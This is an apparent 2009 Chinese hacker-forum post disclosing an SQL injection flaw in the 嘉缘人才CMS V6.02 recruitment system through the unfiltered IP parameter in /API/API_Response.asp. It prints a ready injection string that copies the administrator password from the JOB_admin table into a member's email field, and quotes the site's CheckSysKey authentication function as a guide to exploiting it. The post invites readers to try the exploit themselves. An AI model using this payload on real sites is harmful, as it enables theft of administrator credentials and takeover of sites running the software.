|
|
漏洞作者:幻泉[B.S.N]
漏洞来源: http://www.hacker.com.cn
源码下载: 自己动手丰衣足食。
程序版本:嘉缘人才CMS系统V6.02(本人只测试了6.02,老版本大家自己测试吧。)
漏洞等级:高
漏洞说明:
/API/API_Response.asp
由于对ip没做过滤进行update操作导致出现注射漏洞。
如果access限制比较多。但是可以利用一下代码测试。
Code:
',Member_email=dFirst('JOB_pass','JOB_admin'),Member_url='aaa
这样就更新密码到email里了。
分析这个漏洞还需要对以下代码分析。
Code:
Function CheckSysKey(iName, iSysKey) ' username=huanquan syskey
If IsNull(iName) Or iName = "" Or IsNull(iSysKey) Or iSysKey = "" Then '如果都是空则结束调用
CheckSysKey = False
Exit Function
End If
If Len(iSysKey) = 32 Then '如果syskey长度是32则获取9-16位
iSysKey = Mid(iSysKey, 9, 16)
End If
Dim strFRKey, strFRKeyNew
strFRKey = Md5(iName&API_SysKey,16) 'baf588a6ba715854
strFRKeyNew = Md5(iName&API_SysKey,16) 'baf588a6ba715854
If LCase(iSysKey) = LCase(strFRKey) Or LCase(iSysKey) = LCase(strFRKeyNew) Then
CheckSysKey = True
Else
CheckSysKey = False
End If
我只介绍大概,漏洞利用代码都给了,大家可以自己看他的程序。 |
|
发表于 2009-8-2 08:22:41